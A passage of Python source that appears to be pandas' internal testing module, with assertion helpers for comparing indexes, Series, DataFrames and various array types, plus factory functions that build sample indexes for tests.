            # get_level_values may change dtype
            _check_types(left.levels[level], right.levels[level], obj=obj)

    # skip exact index checking when `check_categorical` is False
    if check_exact and check_categorical:
        if not left.equals(right):
            diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
            msg = f"{obj} values are different ({np.round(diff, 5)} %)"
            raise_assert_detail(obj, msg, left, right)
    else:
        _testing.assert_almost_equal(
            left.values,
            right.values,
            rtol=rtol,
            atol=atol,
            check_dtype=exact,
            obj=obj,
            lobj=left,
            robj=right,
        )

    # metadata comparison
    if check_names:
        assert_attr_equal("names", left, right, obj=obj)
    if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
        assert_attr_equal("freq", left, right, obj=obj)
    if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
        assert_interval_array_equal(left._values, right._values)

    if check_categorical:
        if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
            assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
    """
    Check that both objects have the same class, honouring ``exact``.
    """
    __tracebackhide__ = True

    def repr_class(x):
        if isinstance(x, Index):
            # return Index as it is to include values in the error message
            return x
        return type(x).__name__

    if type(left) == type(right):
        return
    if exact == "equiv":
        # allow Int64Index and RangeIndex to be used interchangeably
        names = {type(left).__name__, type(right).__name__}
        if not names <= {"Int64Index", "RangeIndex"}:
            msg = f"{obj} classes are not equivalent"
            raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
    elif exact:
        msg = f"{obj} classes are different"
        raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
    """
    Check attributes are equal. Both objects must have attribute.

    Parameters
    ----------
    attr : str
        Attribute name being compared.
    left : object
    right : object
    obj : str, default 'Attributes'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    left_attr = getattr(left, attr)
    right_attr = getattr(right, attr)

    # identical objects are trivially equal
    if left_attr is right_attr:
        return True
    # two NaN attribute values compare equal even though NaN != NaN
    if (
        is_number(left_attr)
        and np.isnan(left_attr)
        and is_number(right_attr)
        and np.isnan(right_attr)
    ):
        return True

    try:
        result = left_attr == right_attr
    except TypeError:
        # datetimetz on rhs may raise TypeError
        result = False
    if not isinstance(result, bool):
        # array-valued comparison: require all elements equal
        result = result.all()

    if not result:
        msg = f'Attribute "{attr}" are different'
        raise_assert_detail(obj, msg, left_attr, right_attr)
    return True
def assert_is_valid_plot_return_object(objs):
    """
    Assert that ``objs`` looks like the return value of a pandas plot call:
    either an array/Series of matplotlib Axes, or a single Artist/tuple/dict.
    """
    import matplotlib.pyplot as plt

    if isinstance(objs, (pd.Series, np.ndarray)):
        for el in objs.ravel():
            msg = (
                "one of 'objs' is not a matplotlib Axes instance, "
                f"type encountered {repr(type(el).__name__)}"
            )
            assert isinstance(el, (plt.Axes, dict)), msg
    else:
        # BUG FIX: the message previously read "ArtistArtist" (doubled word)
        msg = (
            "objs is neither an ndarray of Artist instances nor a single "
            "Artist instance, tuple, or dict, 'objs' is a "
            f"{repr(type(objs).__name__)}"
        )
        assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
    """Assert that the sequence is sorted (ascending, per np.sort)."""
    # work on the underlying ndarray of pandas containers
    if isinstance(seq, (Index, Series)):
        seq = seq.values
    # sorting does not change precisions
    assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
    left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
    """
    Test that Categoricals are equivalent.

    Parameters
    ----------
    left : Categorical
    right : Categorical
    check_dtype : bool, default True
        Check that integer dtype of the codes are the same
    check_category_order : bool, default True
        Whether the order of the categories should be compared, which
        implies identical integer codes.  If False, only the resulting
        values are compared.  The ordered attribute is
        checked regardless.
    obj : str, default 'Categorical'
        Specify object name being compared, internally used to show appropriate
        assertion message

    Raises
    ------
    AssertionError : the two Categoricals differ under the requested checks.
    """
    _check_isinstance(left, right, Categorical)
    if check_category_order:
        # order-sensitive: categories and codes must match position for position
        assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
        assert_numpy_array_equal(
            left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
        )
    else:
        # order-insensitive: compare sorted categories, then the materialized
        # values (categories taken at the codes)
        try:
            lc = left.categories.sort_values()
            rc = right.categories.sort_values()
        except TypeError:
            # e.g. '<' not supported between instances of 'int' and 'str'
            lc, rc = left.categories, right.categories
        assert_index_equal(
            lc, rc, obj=f"{obj}.categories",
        )
        assert_index_equal(
            left.categories.take(left.codes),
            right.categories.take(right.codes),
            obj=f"{obj}.values",
        )
    # the ordered flag is compared in both modes
    assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
    """
    Test that two IntervalArrays are equivalent.

    Parameters
    ----------
    left, right : IntervalArray
        The IntervalArrays to compare.
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    obj : str, default 'IntervalArray'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, IntervalArray)
    assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
    # BUG FIX: the right-endpoint comparison was mislabelled "{obj}.left",
    # making failure messages point at the wrong attribute
    assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
    assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
    """Assert that two PeriodArrays have equal ordinal data and freq."""
    _check_isinstance(left, right, PeriodArray)
    # compare the underlying integer ordinals directly
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
    assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
    """Assert that two DatetimeArrays have equal data, freq and tz."""
    __tracebackhide__ = True
    _check_isinstance(left, right, DatetimeArray)
    # compare the underlying i8 data directly
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
    assert_attr_equal("freq", left, right, obj=obj)
    assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
    """Assert that two TimedeltaArrays have equal data and freq."""
    __tracebackhide__ = True
    _check_isinstance(left, right, TimedeltaArray)
    # compare the underlying i8 data directly
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
    assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
    """
    Raise an AssertionError with a standard multi-line comparison report:
    header, optional [index], [left], [right], and optional [diff] sections.
    """
    __tracebackhide__ = True

    def _render(value):
        # pretty-print ndarrays; show categoricals via repr; pass through rest
        if isinstance(value, np.ndarray):
            return pprint_thing(value)
        if is_categorical_dtype(value):
            return repr(value)
        return value

    parts = [f"{obj} are different\n{message}"]
    if isinstance(index_values, np.ndarray):
        parts.append(f"[index]: {pprint_thing(index_values)}")
    parts.append(f"[left]: {_render(left)}")
    parts.append(f"[right]: {_render(right)}")
    if diff is not None:
        parts.append(f"[diff]: {diff}")
    raise AssertionError("\n".join(parts))
def assert_numpy_array_equal(
    left,
    right,
    strict_nan=False,
    check_dtype=True,
    err_msg=None,
    check_same=None,
    obj="numpy array",
    index_values=None,
):
    """
    Check that 'np.ndarray' is equivalent.

    Parameters
    ----------
    left, right : numpy.ndarray or iterable
        The two arrays to be compared.
    strict_nan : bool, default False
        If True, consider NaN and None to be different.
    check_dtype : bool, default True
        Check dtype if both a and b are np.ndarray.
    err_msg : str, default None
        If provided, used as assertion message.
    check_same : None|'copy'|'same', default None
        Ensure left and right refer/do not refer to the same memory area.
    obj : str, default 'numpy array'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    index_values : numpy.ndarray, default None
        optional index (shared by both left and right), used in output.

    Raises
    ------
    AssertionError : the arrays differ (or violate the check_same constraint).
    """
    __tracebackhide__ = True
    # instance validation
    # Show a detailed error message when classes are different
    assert_class_equal(left, right, obj=obj)
    # both classes must be an np.ndarray
    _check_isinstance(left, right, np.ndarray)
    def _get_base(obj):
        # resolve a view to the array that owns the memory
        return obj.base if getattr(obj, "base", None) is not None else obj
    left_base = _get_base(left)
    right_base = _get_base(right)
    # optional memory-sharing constraint
    if check_same == "same":
        if left_base is not right_base:
            raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
    elif check_same == "copy":
        if left_base is right_base:
            raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
    def _raise(left, right, err_msg):
        # build and raise the detailed failure message (always raises)
        if err_msg is None:
            if left.shape != right.shape:
                raise_assert_detail(
                    obj, f"{obj} shapes are different", left.shape, right.shape,
                )
            diff = 0
            for l, r in zip(left, right):
                # count up differences
                if not array_equivalent(l, r, strict_nan=strict_nan):
                    diff += 1
            # report the percentage of differing positions
            diff = diff * 100.0 / left.size
            msg = f"{obj} values are different ({np.round(diff, 5)} %)"
            raise_assert_detail(obj, msg, left, right, index_values=index_values)
        raise AssertionError(err_msg)
    # compare shape and values
    if not array_equivalent(left, right, strict_nan=strict_nan):
        _raise(left, right, err_msg)
    if check_dtype:
        if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
            assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
    left,
    right,
    check_dtype=True,
    index_values=None,
    check_less_precise=no_default,
    check_exact=False,
    rtol: float = 1.0e-5,
    atol: float = 1.0e-8,
):
    """
    Check that left and right ExtensionArrays are equal.

    Parameters
    ----------
    left, right : ExtensionArray
        The two arrays to compare.
    check_dtype : bool, default True
        Whether to check if the ExtensionArray dtypes are identical.
    index_values : numpy.ndarray, default None
        Optional index (shared by both left and right), used in output.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.

        .. deprecated:: 1.1.0
           Use `rtol` and `atol` instead to define relative/absolute
           tolerance, respectively. Similar to :func:`math.isclose`.
    check_exact : bool, default False
        Whether to compare number exactly.
    rtol : float, default 1e-5
        Relative tolerance. Only used when check_exact is False.

        .. versionadded:: 1.1.0
    atol : float, default 1e-8
        Absolute tolerance. Only used when check_exact is False.

        .. versionadded:: 1.1.0

    Notes
    -----
    Missing values are checked separately from valid values.
    A mask of missing values is computed for each and checked to match.
    The remaining all-valid values are cast to object dtype and checked.
    """
    if check_less_precise is not no_default:
        # translate the deprecated parameter into equivalent rtol/atol values
        warnings.warn(
            "The 'check_less_precise' keyword in testing.assert_*_equal "
            "is deprecated and will be removed in a future version. "
            "You can stop passing 'check_less_precise' to silence this warning.",
            FutureWarning,
            stacklevel=2,
        )
        rtol = atol = _get_tol_from_less_precise(check_less_precise)
    assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
    assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
    if check_dtype:
        assert_attr_equal("dtype", left, right, obj="ExtensionArray")
    if (
        isinstance(left, DatetimeLikeArrayMixin)
        and isinstance(right, DatetimeLikeArrayMixin)
        and type(right) == type(left)
    ):
        # Avoid slow object-dtype comparisons
        # np.asarray for case where we have a np.MaskedArray
        assert_numpy_array_equal(
            np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
        )
        return
    # compare the missing-value masks first
    left_na = np.asarray(left.isna())
    right_na = np.asarray(right.isna())
    assert_numpy_array_equal(
        left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
    )
    # then compare only the valid (non-missing) values as object arrays
    left_valid = np.asarray(left[~left_na].astype(object))
    right_valid = np.asarray(right[~right_na].astype(object))
    if check_exact:
        assert_numpy_array_equal(
            left_valid, right_valid, obj="ExtensionArray", index_values=index_values
        )
    else:
        _testing.assert_almost_equal(
            left_valid,
            right_valid,
            check_dtype=check_dtype,
            rtol=rtol,
            atol=atol,
            obj="ExtensionArray",
            index_values=index_values,
        )
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_series_type=True,
    check_less_precise=no_default,
    check_names=True,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    check_category_order=True,
    check_freq=True,
    rtol=1.0e-5,
    atol=1.0e-8,
    obj="Series",
):
    """
    Check that left and right Series are equal.
    Parameters
    ----------
    left : Series
    right : Series
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_series_type : bool, default True
        Whether to check the Series class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
        .. deprecated:: 1.1.0
           Use `rtol` and `atol` instead to define relative/absolute
           tolerance, respectively. Similar to :func:`math.isclose`.
    check_names : bool, default True
        Whether to check the Series and Index names attribute.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    check_category_order : bool, default True
        Whether to compare category order of internal Categoricals.
        .. versionadded:: 1.0.2
    check_freq : bool, default True
        Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
    rtol : float, default 1e-5
        Relative tolerance. Only used when check_exact is False.
        .. versionadded:: 1.1.0
    atol : float, default 1e-8
        Absolute tolerance. Only used when check_exact is False.
        .. versionadded:: 1.1.0
    obj : str, default 'Series'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    # Hide this frame from pytest tracebacks so failures point at the caller.
    __tracebackhide__ = True
    if check_less_precise is not no_default:
        warnings.warn(
            "The 'check_less_precise' keyword in testing.assert_*_equal "
            "is deprecated and will be removed in a future version. "
            "You can stop passing 'check_less_precise' to silence this warning.",
            FutureWarning,
            stacklevel=2,
        )
        # legacy knob maps onto both tolerances at once
        rtol = atol = _get_tol_from_less_precise(check_less_precise)
    # instance validation
    _check_isinstance(left, right, Series)
    if check_series_type:
        assert_class_equal(left, right, obj=obj)
    # length comparison
    if len(left) != len(right):
        msg1 = f"{len(left)}, {left.index}"
        msg2 = f"{len(right)}, {right.index}"
        raise_assert_detail(obj, "Series length are different", msg1, msg2)
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_exact=check_exact,
        check_categorical=check_categorical,
        rtol=rtol,
        atol=atol,
        obj=f"{obj}.index",
    )
    # freq is compared separately here; only datetime-like indexes carry it
    if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
        lidx = left.index
        ridx = right.index
        assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
    if check_dtype:
        # We want to skip exact dtype checking when `check_categorical`
        # is False. We'll still raise if only one is a `Categorical`,
        # regardless of `check_categorical`
        if (
            is_categorical_dtype(left.dtype)
            and is_categorical_dtype(right.dtype)
            and not check_categorical
        ):
            pass
        else:
            assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
    # value comparison: the branches below are ordered most-specific first
    if check_exact:
        # exact comparison is only defined for numeric data
        if not is_numeric_dtype(left.dtype):
            raise AssertionError("check_exact may only be used with numeric Series")
        assert_numpy_array_equal(
            left._values,
            right._values,
            check_dtype=check_dtype,
            obj=str(obj),
            index_values=np.asarray(left.index),
        )
    elif check_datetimelike_compat and (
        needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
    ):
        # we want to check only if we have compat dtypes
        # e.g. integer and M|m are NOT compat, but we can simply check
        # the values in that case
        # datetimelike may have different objects (e.g. datetime.datetime
        # vs Timestamp) but will compare equal
        if not Index(left._values).equals(Index(right._values)):
            msg = (
                f"[datetimelike_compat=True] {left._values} "
                f"is not equal to {right._values}."
            )
            raise AssertionError(msg)
    elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
        assert_interval_array_equal(left.array, right.array)
    elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
        _testing.assert_almost_equal(
            left._values,
            right._values,
            rtol=rtol,
            atol=atol,
            check_dtype=check_dtype,
            obj=str(obj),
            index_values=np.asarray(left.index),
        )
    elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
        assert_extension_array_equal(
            left._values, right._values, index_values=np.asarray(left.index)
        )
    elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
        # DatetimeArray or TimedeltaArray
        assert_extension_array_equal(
            left._values, right._values, index_values=np.asarray(left.index)
        )
    else:
        # generic fallback: approximate comparison of the raw values
        _testing.assert_almost_equal(
            left._values,
            right._values,
            rtol=rtol,
            atol=atol,
            check_dtype=check_dtype,
            obj=str(obj),
            index_values=np.asarray(left.index),
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("name", left, right, obj=obj)
    if check_categorical:
        if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
            assert_categorical_equal(
                left._values,
                right._values,
                obj=f"{obj} category",
                check_category_order=check_category_order,
            )
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_column_type="equiv",
    check_frame_type=True,
    check_less_precise=no_default,
    check_names=True,
    by_blocks=False,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    check_like=False,
    check_freq=True,
    rtol=1.0e-5,
    atol=1.0e-8,
    obj="DataFrame",
):
    """
    Check that left and right DataFrame are equal.
    This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
    Additional parameters allow varying the strictness of the
    equality checks performed.
    Parameters
    ----------
    left : DataFrame
        First DataFrame to compare.
    right : DataFrame
        Second DataFrame to compare.
    check_dtype : bool, default True
        Whether to check the DataFrame dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_column_type : bool or {'equiv'}, default 'equiv'
        Whether to check the columns class, dtype and inferred_type
        are identical. Is passed as the ``exact`` argument of
        :func:`assert_index_equal`.
    check_frame_type : bool, default True
        Whether to check the DataFrame class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
        .. deprecated:: 1.1.0
           Use `rtol` and `atol` instead to define relative/absolute
           tolerance, respectively. Similar to :func:`math.isclose`.
    check_names : bool, default True
        Whether to check that the `names` attribute for both the `index`
        and `column` attributes of the DataFrame is identical.
    by_blocks : bool, default False
        Specify how to compare internal data. If False, compare by columns.
        If True, compare by blocks.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    check_like : bool, default False
        If True, ignore the order of index & columns.
        Note: index labels must match their respective rows
        (same as in columns) - same labels must be with the same data.
    check_freq : bool, default True
        Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
    rtol : float, default 1e-5
        Relative tolerance. Only used when check_exact is False.
        .. versionadded:: 1.1.0
    atol : float, default 1e-8
        Absolute tolerance. Only used when check_exact is False.
        .. versionadded:: 1.1.0
    obj : str, default 'DataFrame'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    See Also
    --------
    assert_series_equal : Equivalent method for asserting Series equality.
    DataFrame.equals : Check DataFrame equality.
    Examples
    --------
    This example shows comparing two DataFrames that are equal
    but with columns of differing dtypes.
    >>> from pandas._testing import assert_frame_equal
    >>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    >>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
    df1 equals itself.
    >>> assert_frame_equal(df1, df1)
    df1 differs from df2 as column 'b' is of a different type.
    >>> assert_frame_equal(df1, df2)
    Traceback (most recent call last):
    ...
    AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
    Attribute "dtype" are different
    [left]:  int64
    [right]: float64
    Ignore differing dtypes in columns with check_dtype.
    >>> assert_frame_equal(df1, df2, check_dtype=False)
    """
    # Hide this frame from pytest tracebacks so failures point at the caller.
    __tracebackhide__ = True
    if check_less_precise is not no_default:
        warnings.warn(
            "The 'check_less_precise' keyword in testing.assert_*_equal "
            "is deprecated and will be removed in a future version. "
            "You can stop passing 'check_less_precise' to silence this warning.",
            FutureWarning,
            stacklevel=2,
        )
        # legacy knob maps onto both tolerances at once
        rtol = atol = _get_tol_from_less_precise(check_less_precise)
    # instance validation
    _check_isinstance(left, right, DataFrame)
    if check_frame_type:
        # NOTE(review): this only asserts a subclass relationship, unlike the
        # stricter assert_class_equal kept commented out below.
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # shape comparison
    if left.shape != right.shape:
        raise_assert_detail(
            obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
        )
    if check_like:
        # align left onto right's labels so order differences are ignored
        left, right = left.reindex_like(right), right
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_exact=check_exact,
        check_categorical=check_categorical,
        rtol=rtol,
        atol=atol,
        obj=f"{obj}.index",
    )
    # column comparison
    assert_index_equal(
        left.columns,
        right.columns,
        exact=check_column_type,
        check_names=check_names,
        check_exact=check_exact,
        check_categorical=check_categorical,
        rtol=rtol,
        atol=atol,
        obj=f"{obj}.columns",
    )
    # compare by blocks
    if by_blocks:
        # uses the private block-manager layout; keys are dtype names
        rblocks = right._to_dict_of_blocks()
        lblocks = left._to_dict_of_blocks()
        for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
            assert dtype in lblocks
            assert dtype in rblocks
            assert_frame_equal(
                lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
            )
    # compare by columns
    else:
        for i, col in enumerate(left.columns):
            assert col in right
            lcol = left.iloc[:, i]
            rcol = right.iloc[:, i]
            assert_series_equal(
                lcol,
                rcol,
                check_dtype=check_dtype,
                check_index_type=check_index_type,
                check_exact=check_exact,
                check_names=check_names,
                check_datetimelike_compat=check_datetimelike_compat,
                check_categorical=check_categorical,
                check_freq=check_freq,
                obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
                rtol=rtol,
                atol=atol,
            )
def assert_equal(left, right, **kwargs):
    """
    Dispatch to the appropriate ``tm.assert_*_equal`` comparison function.

    Parameters
    ----------
    left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
        The two items to be compared.
    **kwargs
        All keyword arguments are passed through to the underlying assert method.
    """
    __tracebackhide__ = True
    # Dispatch order matters: specific pandas containers are tested before
    # the generic ExtensionArray / ndarray fallbacks.
    if isinstance(left, pd.Index):
        assert_index_equal(left, right, **kwargs)
        if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
            # the freq attribute is checked here in addition to the values
            assert left.freq == right.freq, (left.freq, right.freq)
        return
    if isinstance(left, pd.Series):
        assert_series_equal(left, right, **kwargs)
        return
    if isinstance(left, pd.DataFrame):
        assert_frame_equal(left, right, **kwargs)
        return
    if isinstance(left, IntervalArray):
        assert_interval_array_equal(left, right, **kwargs)
        return
    if isinstance(left, PeriodArray):
        assert_period_array_equal(left, right, **kwargs)
        return
    if isinstance(left, DatetimeArray):
        assert_datetime_array_equal(left, right, **kwargs)
        return
    if isinstance(left, TimedeltaArray):
        assert_timedelta_array_equal(left, right, **kwargs)
        return
    if isinstance(left, ExtensionArray):
        assert_extension_array_equal(left, right, **kwargs)
        return
    if isinstance(left, np.ndarray):
        assert_numpy_array_equal(left, right, **kwargs)
        return
    if isinstance(left, str):
        # plain strings take no comparison options
        assert kwargs == {}
        assert left == right
        return
    raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
    """
    Wrap the expected output of a test in the requested container class.

    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}
    transpose : bool, default True
        DataFrame case only: return a single-row (transposed) frame.

    Returns
    -------
    subclass of box_cls
    """
    if box_cls is pd.array:
        return pd.array(expected)
    if box_cls is pd.Index:
        return pd.Index(expected)
    if box_cls is pd.Series:
        return pd.Series(expected)
    if box_cls is pd.DataFrame:
        frame = pd.Series(expected).to_frame()
        if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length.
            frame = frame.T
        return frame
    if box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        return period_array(expected)
    if box_cls is DatetimeArray:
        return DatetimeArray(expected)
    if box_cls is TimedeltaArray:
        return TimedeltaArray(expected)
    if box_cls is np.ndarray:
        return np.array(expected)
    if box_cls is to_array:
        return to_array(expected)
    raise NotImplementedError(box_cls)
def to_array(obj):
    """Convert *obj* to the matching array type based on its dtype."""
    # temporary implementation until we get pd.array in place
    dtype = getattr(obj, "dtype", None)
    if is_period_dtype(dtype):
        return period_array(obj)
    if is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
        return DatetimeArray._from_sequence(obj)
    if is_timedelta64_dtype(dtype):
        return TimedeltaArray._from_sequence(obj)
    return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
    """
    Check that the left and right SparseArray are equal.

    Compares the sparse values, the sparse index layout, the fill value and
    dtype, and finally the densified values.

    Parameters
    ----------
    left : SparseArray
    right : SparseArray
    """
    _check_isinstance(left, right, pd.arrays.SparseArray)
    assert_numpy_array_equal(left.sp_values, right.sp_values)
    # SparseIndex comparison
    assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
    assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
    left_index = left.sp_index
    right_index = right.sp_index
    if not left_index.equals(right_index):
        raise_assert_detail(
            "SparseArray.index", "index are not equal", left_index, right_index
        )
    # (removed a dead `else: pass` branch that carried a truncated comment)
    assert_attr_equal("fill_value", left, right)
    assert_attr_equal("dtype", left, right)
    # densify and compare element-wise as a final cross-check
    assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
    """Assert that every element of *iterable* is contained in *dic*."""
    for item in iterable:
        assert item in dic, f"Did not contain item: {repr(item)}"
def assert_copy(iter1, iter2, **eql_kwargs):
    """
    Assert that paired elements of two iterables compare almost equal while
    being distinct objects.

    Elements are compared with ``assert_almost_equal``; items nested inside
    the elements are NOT checked for distinct identity.
    """
    for first, second in zip(iter1, iter2):
        assert_almost_equal(first, second, **eql_kwargs)
        msg = (
            f"Expected object {repr(type(first))} and object {repr(type(second))} to be "
            "different objects, but they were the same object."
        )
        assert first is not second, msg
def getCols(k):
    """Return the first *k* uppercase ASCII letters as a single string."""
    letters = string.ascii_uppercase
    return letters[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Return an Index of *k* random 10-character strings."""
    values = rands_array(nchars=10, size=k)
    return Index(values, name=name)
def makeUnicodeIndex(k=10, name=None):
    """Return an Index of *k* random 10-character unicode strings."""
    values = randu_array(nchars=10, size=k)
    return Index(values, name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """Return a length-*k* CategoricalIndex drawn from *n* random categories."""
    categories = rands_array(nchars=4, size=n)
    codes = np.arange(k) % n
    cat = Categorical.from_codes(codes, categories=categories)
    return CategoricalIndex(cat, name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
    """Return a length-*k* IntervalIndex with evenly spaced breaks over [0, 100]."""
    breaks = np.linspace(0, 100, num=(k + 1))
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Return a boolean Index of length *k* (True only in position 1, if any)."""
    if k == 1:
        values = [True]
    elif k == 2:
        values = [False, True]
    else:
        values = [False, True] + [False] * (k - 2)
    return Index(values, name=name)
def makeIntIndex(k=10, name=None):
    """Return an integer Index of consecutive values 0..k-1."""
    values = list(range(k))
    return Index(values, name=name)
def makeUIntIndex(k=10, name=None):
    """Return an Index of *k* consecutive integers starting at 2**63 (uint64 range)."""
    values = [2 ** 63 + offset for offset in range(k)]
    return Index(values, name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """Return a RangeIndex covering 0..k-1 with step 1."""
    return RangeIndex(start=0, stop=k, step=1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Return a sorted float Index of *k* random values scaled by a random power of ten."""
    # draw order matches the original: k samples, one offset, one exponent
    base = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    scale = 10 ** np.random.randint(0, 9)
    return Index(base * scale, name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
    """Return a DatetimeIndex of *k* periods starting 2000-01-01 at *freq*."""
    start = datetime(2000, 1, 1)
    dates = bdate_range(start, periods=k, freq=freq, name=name)
    return DatetimeIndex(dates, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
    """Return a TimedeltaIndex of *k* periods starting at one day, spaced by *freq*."""
    return pd.timedelta_range(
        start="1 day", periods=k, freq=freq, name=name, **kwargs
    )
def makePeriodIndex(k=10, name=None, **kwargs):
    """Return a business-day PeriodIndex of *k* periods starting 2000-01-01."""
